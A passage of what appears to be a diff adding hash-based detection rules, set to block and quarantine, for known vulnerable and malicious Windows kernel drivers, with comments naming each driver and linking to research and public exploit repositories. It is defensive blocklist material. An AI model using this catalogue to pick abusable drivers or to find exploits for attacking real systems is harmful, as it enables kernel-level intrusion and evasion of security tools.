"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967232Z", + "creation_date": "2026-03-23T11:45:29.967236Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ace242c-c291-52c6-9218-eb4d05d0d23c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141681Z", + "creation_date": "2026-03-23T11:45:31.141683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141688Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13bce760077e9171b9ce3c04ecf999178cca7456cacb30ae70e2f0da2939e33c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0acf925f-7b9c-5aae-a581-8e4d8374d790",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143999Z",
+ "creation_date": "2026-03-23T11:45:32.144001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "090d409f86430e078694e621ad0bd5e458d32aa727f0eb99bda3961577df8d49",
+ "comment": "Malicious Kernel Driver (aka driver_090d409f.sys) [https://www.loldrivers.io/drivers/00561455-9da1-4f0c-8564-e4c99b716a74/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ad25de3-42e4-5165-9468-25555dfb14c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809831Z",
+ "creation_date": "2026-03-23T11:45:31.809833Z",
+ "enabled": true,
+ 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809839Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d6fcd8ceb13d79b67277a41a45e0af208e8d3763c611f647e054921644627ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ada5fdd-b556-574e-894d-d4e0dc321647", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485384Z", + "creation_date": "2026-03-23T11:45:31.485388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485398Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41288baa8b002a997eee958b0bc3f4d1811e8b29befd4d5d694ad7e7cca62ccf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0adad9df-2fdc-5bb9-a33e-e291c3cee407", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827452Z", + "creation_date": "2026-03-23T11:45:30.827454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43ed5171b0881504a3d6338d3edddc3fa5b3b64362433be60168be42595f2b8c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0af681cf-ec70-55d6-b437-484ffe78d7a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473446Z", + "creation_date": "2026-03-23T11:45:31.473450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.473459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a163d95c4e3f7c10b60bb20ef5c8c9c875a022519e68a66a5c0fd7e80f2e0722", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0afa022e-4223-5b3b-9660-cd3a5f1f7eb3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161092Z", + "creation_date": "2026-03-23T11:45:31.161095Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161100Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "070c0221df7c5b6ecee15d8e4a354eac6f793bf3a49be4cd7f3eb739a140926b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0afebba7-2d4f-5a81-850b-5fe7c4829b83", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977764Z", + "creation_date": "2026-03-23T11:45:29.977766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c54ffa9a32cd99972ca905dcf99e20f8429e3cfd45bc1ddf4f9af8b3ed688c88", + "comment": "Vulnerable Kernel Driver (aka Lv561av.sys) [https://www.loldrivers.io/drivers/47a351ee-8abe-40d8-bc2b-557390fa0945/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b0190e6-fdc3-58cf-8c99-9d7173a082fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980935Z", + "creation_date": "2026-03-23T11:45:29.980937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980948Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0a9b608461d55815e99700607a52fbdb7d598f968126d38e10cc4293ac4b1ad8", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b09e8b3-3288-533e-ad58-46806cdce39b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470311Z", + "creation_date": "2026-03-23T11:45:30.470314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09d6169da055725274a8c53c3139baff8ceef52346e5a910e735bb17f634f8bb", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b1c2827-3bb4-54db-ac4e-7ed3fb6a3c55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.495836Z", + "creation_date": "2026-03-23T11:45:31.495838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d705fe962d99b56b8e2c9ceea176a6c78dbf609989a620a44bb3c17df8df8c0d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b1eae1c-6d25-5365-a14f-907dd470526f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968078Z", + "creation_date": "2026-03-23T11:45:29.968080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8abf744f0cbf09d67afc5b7cc9d613e69c73a5c8a45bcd26cf6bcfd03c3515ac", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b2286d0-418d-5bef-a6b6-3b1a4ffc4cda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809813Z", + "creation_date": "2026-03-23T11:45:31.809815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809821Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bcdbdcb40b10886b8357d0e92eb9c8ecc9ad35db08fc372dfdee1e743f31eff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b257322-3d83-521c-9c94-62f931995649", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143130Z", + "creation_date": "2026-03-23T11:45:31.143132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143138Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91163c36f5c9baa0b832df6a9ca6577b2745f482e3a3bae520cf963de493acc8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b29ef05-d328-55a3-8939-f2220f879c94", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140583Z", + "creation_date": "2026-03-23T11:45:31.140585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0edfecc24165a608260dd483d90d59aab016649b3f8f95131a8c8fa88e73a684", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b2ac80c-e48a-5648-9b83-4978eff47b70", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822354Z", + "creation_date": "2026-03-23T11:45:30.822356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822362Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c66ca63774f8aa697fe172233283af90db88902204524294a4df212f9f0b949", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b34bcaf-45c1-5483-8b40-d62dcdfc863c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492108Z", + "creation_date": "2026-03-23T11:45:31.492110Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1292bcc9b02ffd3bd50e50873728c4dbe7278049e2d88cd33b845cefe50bfa3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b378e92-55e2-5e54-b225-e15718223b8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830293Z", + "creation_date": "2026-03-23T11:45:31.830297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830305Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62ede8393d076d04257526c70849b3fffac66ce9c2ffc038ba3b5f653abd93a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b3c41bc-7e47-5676-bfed-d1ed6e285ed4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613171Z", + "creation_date": "2026-03-23T11:45:29.613173Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613178Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d12acedc9a2702a18499b77dc8ae9e6b2d1eb557eb08c8a14b2ab3a984edec01", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b3c54cb-b19a-52fd-bceb-fe9d8fbf083e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612368Z", + "creation_date": "2026-03-23T11:45:29.612370Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"31d8fc6f5fb837d5eb29db828d13ba8ee11867d86a90b2c2483a578e1d0ec43a", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b3de5da-6942-5a18-91e4-31fd0de4542f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967900Z", + "creation_date": "2026-03-23T11:45:29.967902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967909Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d88ac88c0fd37bc34bf547479c226abc8bff1e9e82588a42dbad36ff69c980d", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b442084-73b1-533d-a7e6-49fa95e46d73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975308Z", + "creation_date": "2026-03-23T11:45:29.975310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab1c74ed1ea4fc7a613aa22fd87ee4251ede260862fdebde2d7d2f00c0f23371", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b496ac3-07f3-5422-9d48-7b2dc469dde7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458279Z", + "creation_date": "2026-03-23T11:45:30.458282Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458300Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a855b6ec385b3369c547a3c54e88a013dd028865aba0f3f08be84cdcbaa9a0f6", + 
